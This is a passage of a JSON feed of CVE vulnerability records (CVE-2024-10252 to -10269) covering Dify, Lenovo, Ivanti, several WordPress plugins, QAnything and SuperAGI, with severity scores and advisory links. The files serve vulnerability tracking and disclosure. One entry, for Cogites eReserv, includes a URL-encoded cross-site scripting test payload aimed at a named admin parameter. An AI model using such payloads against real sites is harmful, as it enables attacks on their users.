"HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-12-11T17:15Z", "lastModifiedDate" : "2024-12-13T19:35Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10252", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-94" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/langgenius/dify/commit/4ac99ffe0e1c9f4d7c523908e91bbc7739e0a8d4", "name" : "https://github.com/langgenius/dify/commit/4ac99ffe0e1c9f4d7c523908e91bbc7739e0a8d4", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/62c6c958-96cb-426c-aebc-c41f06b9d7b0", "name" : "https://huntr.com/bounties/62c6c958-96cb-426c-aebc-c41f06b9d7b0", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability in langgenius/dify versions <=v0.9.1 allows for code injection via internal SSRF requests in the Dify sandbox service. This vulnerability enables an attacker to execute arbitrary Python code with root privileges within the sandbox environment, potentially leading to the deletion of the entire sandbox service and causing irreversible damage." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:langgenius:dify:*:*:*:*:*:node.js:*:*", "versionEndIncluding" : "0.9.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-11T20:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10253", "ASSIGNER" : "psirt@lenovo.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://iknow.lenovo.com.cn/detail/425367", "name" : "https://iknow.lenovo.com.cn/detail/425367", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A potential TOCTOU vulnerability was reported in PC Manager, Lenovo Browser, and Lenovo App Store that could allow a local attacker to cause a system crash." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "HIGH", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 4.7, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.0, "impactScore" : 3.6 } }, "publishedDate" : "2025-01-14T22:15Z", "lastModifiedDate" : "2025-01-14T22:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10254", "ASSIGNER" : "psirt@lenovo.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://iknow.lenovo.com.cn/detail/425367", "name" : "https://iknow.lenovo.com.cn/detail/425367", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A potential buffer overflow vulnerability was reported in PC Manager, Lenovo Browser, and Lenovo App Store that could allow a local attacker to cause a system crash." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "HIGH", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 4.7, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.0, "impactScore" : 3.6 } }, "publishedDate" : "2025-01-14T22:15Z", "lastModifiedDate" : "2025-01-14T22:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10256", "ASSIGNER" : "responsible.disclosure@ivanti.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Patch-SDK-CVE-2024-10256", "name" : "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Patch-SDK-CVE-2024-10256", "refsource" : "", "tags" : [ "Mitigation", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Insufficient permissions in Ivanti Patch SDK before version 9.7.703 allows a local authenticated attacker to delete arbitrary files." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:endpoint_manager:2022:su1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:endpoint_manager:2022:-:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:endpoint_manager:2022:su2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:endpoint_manager:2022:su3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:endpoint_manager:2022:su4:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:endpoint_manager:2022:su5:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:endpoint_manager:2022:su6:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:security_controls:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2024.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:neurons_for_patch_management:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2024.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:neurons_agent_platform:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2024.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:patch_for_configuration_manager:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2024.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:patch_software_development_kit:*:*:*:*:*:*:*:*", "versionEndExcluding" : "9.7.703", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-12-10T19:15Z", "lastModifiedDate" : "2025-08-12T19:04Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1026", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252293", "name" : "https://vuldb.com/?ctiid.252293", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252293", "name" : "https://vuldb.com/?id.252293", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252293", "name" : "https://vuldb.com/?ctiid.252293", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252293", "name" : "https://vuldb.com/?id.252293", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. This issue affects some unknown processing of the file front/admin/config.php. The manipulation of the argument id with the input %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-252293 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cogites:ereserv:7.7.58:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-30T01:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10260", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.svn.wordpress.org/tripetto/trunk/lib/attachments.php", "name" : "https://plugins.svn.wordpress.org/tripetto/trunk/lib/attachments.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3718c252-2ca3-4f7d-b43a-3c1b2e6b34c0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3718c252-2ca3-4f7d-b43a-3c1b2e6b34c0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Tripetto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via File uploads in all versions up to, and including, 8.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the file." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tripetto:tripetto:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "8.0.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-15T06:15Z", "lastModifiedDate" : "2024-11-19T21:20Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10261", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3182968/paid-member-subscriptions", "name" : "https://plugins.trac.wordpress.org/changeset/3182968/paid-member-subscriptions", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/eaf19371-7b06-45c6-bf16-6ef7dfffb175?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/eaf19371-7b06-45c6-bf16-6ef7dfffb175?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The The Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.13.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cozmoslabs:membership_\\&_content_restriction_-_paid_member_subscriptions:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.13.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-09T12:15Z", "lastModifiedDate" : "2025-01-29T19:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10262", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-94" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/fa0a296a-a93f-4c0e-9911-b4f9bdd53fad?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/fa0a296a-a93f-4c0e-9911-b4f9bdd53fad?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/drop-shadow-boxes/trunk/dropshadowboxes.php#L150", "name" : "https://plugins.trac.wordpress.org/browser/drop-shadow-boxes/trunk/dropshadowboxes.php#L150", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/drop-shadow-boxes/#developers", "name" : "https://wordpress.org/plugins/drop-shadow-boxes/#developers", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The The Drop Shadow Boxes plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.7.14. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "LOW", "baseScore" : 6.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.4 } }, "publishedDate" : "2024-11-16T04:15Z", "lastModifiedDate" : "2024-11-18T17:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10263", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3179272/tickera-event-ticketing-system", "name" : "https://plugins.trac.wordpress.org/changeset/3179272/tickera-event-ticketing-system", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6e5e9249-9705-4cfa-9c8e-2e002190562b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6e5e9249-9705-4cfa-9c8e-2e002190562b?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Tickera – WordPress Event Ticketing plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.5.4.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tickera:tickera:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.5.4.6", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-05T13:15Z", "lastModifiedDate" : "2024-11-08T15:59Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10264", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-444" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/988247d5-fd60-4d85-845a-e867d62c0d02", "name" : "https://huntr.com/bounties/988247d5-fd60-4d85-845a-e867d62c0d02", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "HTTP Request Smuggling vulnerability in netease-youdao/qanything version 1.4.1 allows attackers to exploit inconsistencies in the interpretation of HTTP requests between a proxy and a server. This can lead to unauthorized access, bypassing security controls, session hijacking, data leakage, and potentially arbitrary code execution." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:youdao:qanything:1.4.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-08-01T10:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10265", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0fb1a2c2-581d-47ed-a180-9f70fdf79066?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0fb1a2c2-581d-47ed-a180-9f70fdf79066?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/form-maker/#developers", "name" : "https://wordpress.org/plugins/form-maker/#developers", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/form-maker/trunk/wd/includes/notices.php#L199", "name" : "https://plugins.trac.wordpress.org/browser/form-maker/trunk/wd/includes/notices.php#L199", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3183170/", "name" : "https://plugins.trac.wordpress.org/changeset/3183170/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.15.30. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:10web:form_maker:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.15.31", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-10T13:15Z", "lastModifiedDate" : "2024-11-14T15:17Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10266", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c6102c07-2776-4963-8d16-a779c5979275?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c6102c07-2776-4963-8d16-a779c5979275?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3176303/premium-addons-for-elementor", "name" : "https://plugins.trac.wordpress.org/changeset/3176303/premium-addons-for-elementor", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Video Box widget in all versions up to, and including, 4.10.60 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.10.61", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-29T11:15Z", "lastModifiedDate" : "2025-03-07T14:55Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10267", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-359" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/13da8366-4670-4d46-9f5a-ba3f642b692e", "name" : "https://huntr.com/bounties/13da8366-4670-4d46-9f5a-ba3f642b692e", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An information disclosure vulnerability exists in the latest version of transformeroptimus/superagi. An attacker can leak sensitive user information, including names, emails, and passwords, by attempting to register a new account with an email that is already in use. The server returns all information associated with the existing account. The vulnerable endpoint is located in the user registration functionality." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:superagi:superagi:0.0.14:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-18T19:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10268", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/861d0218-0f0f-4299-a0ff-854832348457?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/861d0218-0f0f-4299-a0ff-854832348457?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/mp3-music-player-by-sonaar/#developers", "name" : "https://wordpress.org/plugins/mp3-music-player-by-sonaar/#developers", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3188034/", "name" : "https://plugins.trac.wordpress.org/changeset/3188034/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sonaar_audioplayer shortcode in all versions up to, and including, 5.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sonaar:mp3_audio_player_for_music\\,_radio_\\&_podcast:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "5.9", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-19T08:15Z", "lastModifiedDate" : "2025-01-17T14:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10269", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5fbc0866-1e9d-457a-8ef3-fb046c89c1dd?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5fbc0866-1e9d-457a-8ef3-fb046c89c1dd?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/easy-svg/#developers", "name" : "https://wordpress.org/plugins/easy-svg/#developers", "refsource" : "", "tags" : [ "Product", "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3181757/", "name" : "https://plugins.trac.wordpress.org/changeset/3181757/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Easy SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:benjaminzekavica:easy_svg_support:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : 